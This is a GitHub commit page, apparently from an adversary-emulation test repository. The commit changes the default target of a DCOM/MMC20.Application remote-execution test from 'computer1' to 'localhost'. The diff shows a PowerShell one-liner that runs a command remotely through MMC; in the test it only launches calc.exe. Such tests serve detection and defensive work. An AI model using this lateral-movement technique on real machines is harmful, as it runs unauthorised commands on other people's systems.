Skip to content

Commit

Permalink
Changed default computer target from computer1 to localhost in the re…
Browse files Browse the repository at this point in the history
…mote execution through MMC (#1218)

Co-authored-by: Didier Cambefort <[email protected]>
Co-authored-by: Carrie Roberts <[email protected]>
  • Loading branch information
3 people authored Sep 15, 2020
1 parent 00948b0 commit 74ad184
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion atomics/T1021.006/T1021.006.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -30,7 +30,7 @@ atomic_tests:
computer_name:
description: Name of Computer
type: string
default: computer1
default: localhost
executor:
command: |
[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
Expand Down

0 comments on commit 74ad184

Please sign in to comment.